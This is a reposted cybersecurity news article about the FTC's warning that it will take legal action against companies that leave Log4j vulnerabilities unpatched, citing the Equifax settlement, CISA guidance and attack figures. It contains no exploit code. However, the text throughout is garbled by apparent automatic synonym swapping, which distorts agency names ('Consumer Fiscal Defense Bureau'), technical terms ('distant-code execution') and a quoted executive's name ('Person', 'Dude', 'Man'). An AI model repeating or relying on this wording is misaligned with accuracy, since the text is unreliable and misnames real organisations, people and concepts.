• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
ftc to go after companies that ignore log4j

FTC to Go After Companies that Ignore Log4j

You are here: Home / Latest Cyber Security Vulnerabilities / FTC to Go After Companies that Ignore Log4j
January 5, 2022

Companies that are unsuccessful to defend safe customer data from Log4J attacks are at risk of facing Equifax-esque legal action and fines, the FTC warned.

The Federal Trade Commission (FTC) will muster its legal muscle mass to pursue corporations and sellers that are unsuccessful to protect shopper info from the dangers of the Log4j vulnerabilities, it warned on Tuesday.

“The FTC intends to use its complete lawful authority to go after providers that fall short to take reasonable steps to safeguard buyer details from exposure as a outcome of Log4j, or comparable recognised vulnerabilities in the long run,” in accordance to the warning.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


Those people organizations that bungle buyer info, leaving vulnerabilities unpatched and consequently opening the door to exploits and the ensuing probable “loss or breach of private details, money reduction, and other irreversible harms,” are jeopardizing repercussions tied to weighty regulations that have resulted in body fat fines, the FTC claimed.

It mentioned, among some others, the Federal Trade Commission Act  and the Gramm-Leach-Bliley Act. The FTC Act, the commission’s major statute, enables it to seek monetary redress and other aid for carry out injurious to consumers. Gramm-Leach-Bliley needs money institutions to safeguard sensitive knowledge.

“ It is critical that businesses and their distributors relying on Log4j act now, in get to minimize the likelihood of damage to consumers, and to steer clear of FTC lawful motion,” the FTC urged.

The FTC indicates it: Its warning bundled a reference to the issues from Equifax, which agreed to pay back $700 million to settle actions by the FTC, the Consumer Fiscal Defense Bureau, and all fifty states around its infamous 2017 details leak. (Consumers’ reaction at the time: Make it hurt a lot more.)

According to the complaint in Equifax, its  failure to patch a known vulnerability “irreversibly uncovered the personalized data of 147 million customers.” Count on much more of the exact if your company fails to shield consumer info from exposure as a consequence of Log4j or whatsoever equivalent, recognized vulnerabilities crop up, it stated.

The FTC recommended firms to use guidance from the Cybersecurity and Infrastructure Security Agency (CISA) to look at if they are working with Apache’s Log4j logging library, which is at the coronary heart of the cluster of vulnerabilities recognised as Log4Shell.

Organizations that come across that they are employing Log4j must do the pursuing, CISA proposed:

  • Update your Log4j application package to the most latest version .
  • Seek advice from CISA guidance to mitigate this vulnerability.
  • Make certain remedial actions are taken to make certain that your company’s practices do not violate the law. Failure to determine and patch circumstances of this application may well violate the FTC Act.
  • Distribute this information to any relevant third-party subsidiaries that sell products or products and services to shoppers who might be vulnerable.

On Dec. 17, CISA issued an emergency directive mandating federal civilian departments and companies to right away patch their internet-dealing with units for the Log4j vulnerabilities by Thursday, Dec. 23. Federal businesses had been offered five extra days – until finally Dec. 28 – to report Log4Shell-influenced merchandise, which includes seller and application names and variations, along with what steps have been taken – e.g. current, mitigated, taken out from agency network – to block exploitation tries.

CISA provides a committed website page for the Log4Shell flaws with patching details and has unveiled a Log4j scanner to hunt down most likely susceptible web solutions.

The Log4j Fire Rages Unabated

The preliminary flaw – CVE-2021-44228 – was found out on Dec. 9 and arrived underneath attack within hours. As of Dec. 15, far more than 1.8 million attacks, against 50 percent of all corporate networks, working with at least 70 distinctive malware families, experienced previously been released to exploit what grew to become a trio of bugs:

  • The Log4Shell distant-code execution (RCE) bug that spawned even nastier mutations and which led to …
  • The prospective for denial-of-support (DoS) in Apache’s initial patch. As well as, there was …
  • A 3rd bug, a DoS flaw related to Log4Shell in that it also impacted the logging library. It differed in that it worried Context Map lookups, not the Java Naming and Listing Interface (JNDI) lookups to an LDAP server associated in CVE-2021-44228: lookups that allow for attackers to execute any code which is returned in the Log4Shell vulnerability.
  • At this point, the Conti ransomware gang has experienced a full attack chain in put for months.

    In a Monday update, Microsoft mentioned that the conclusion of December introduced no relief: The enterprise noticed state-sponsored and cyber-criminal attackers probing devices for the Log4Shell flaw by month’s end. “Microsoft has noticed attackers making use of a lot of of the exact same inventory procedures to find targets. Innovative adversaries (like nation-condition actors) and commodity attackers alike have been observed getting gain of these vulnerabilities. There is superior opportunity for the expanded use of the vulnerabilities,” Microsoft security researchers warned.

    “Exploitation makes an attempt and tests have remained high for the duration of the last months of December. We have observed many present attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to arms-on-keyboard attacks,” the researchers mentioned.

    Hunting Down Log4j

    One of the most demanding elements of responding to the log4j vulnerability is basically determining the gadgets in an organization exactly where log4j is utilised. The term “ubiquitous” has utilized due to the fact the get-go: “Since it is a cross-platform, widely utilized software package library, there is incredible variety in in which and how it is deployed: it can be an application bundle set up by by itself, bundled with one more software bundle as just a further file on disk or embedded in a different software with no noticeable artifact,” J.J. Person, co-founder and CEO, Sevco Security, told Threatpost on Wednesday.

    “Even worse, it is utilised in almost everything from cloud-managed solutions to server purposes and even mounted-functionality, embedded units. That internet-related toaster is incredibly likely susceptible to log4shell.”

    We’re just in the center of the triage stage now, Dude claimed, the place simple tools like systems management or program management instruments to check out for the file on disk can supply initial triage.

    A single query: What’s the stock of tools that nonetheless demands to be triaged?

    “For organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage benefits requires they report not only the equipment that have been triaged but also how numerous are pending triage,” Man remarked. “Reporting the ‘pending triage’ statistic calls for a comprehensive asset inventory, which includes which devices have been successfully triaged.”

    It referred to as this “one of the bigger concealed challenges” in each and every organization’s reaction, supplied that so couple of have a complete asset stock, “despite the point it has been a best necessity in each individual security compliance method for decades.”

    Picture courtesy of Quince Media. Licensing details.

    Test out our free of charge future live and on-need on the web town halls – special, dynamic conversations with cybersecurity gurus and the Threatpost group.


    Some sections of this article are sourced from:
    threatpost.com

    Previous Post: «Cyber Security News Aqua Security Appoints Paul Calatayud as CISO
    Next Post: Uber Bug, Ignored for Years, Casts Doubt on Official Uber Emails uber bug, ignored for years, casts doubt on official uber»

    Reader Interactions

    Leave a Reply Cancel reply

    Your email address will not be published. Required fields are marked *

    Primary Sidebar

    Report This Article

    Recent Posts

    • Enzo Biochem Hit by Ransomware, 2.5 Million Patients’ Data Compromised
    • US and Korean Agencies Issue Warning on North Korean Cyber-Attacks
    • Malicious PyPI Packages Use Compiled Python Code to Bypass Detection
    • New Botnet Malware ‘Horabot’ Targets Spanish-Speaking Users in Latin America
    • The Importance of Managing Your Data Security Posture
    • Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering
    • Insurers Predict $33bn Bill for Catastrophic “Cyber Event”
    • Chinese Phishing Gang “PostalFurious” Expands Campaign
    • Kaspersky Says it is Being Targeted By Zero-Click Exploits
    • North Korea’s Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks

    Copyright © TheCyberSecurity.News, All Rights Reserved.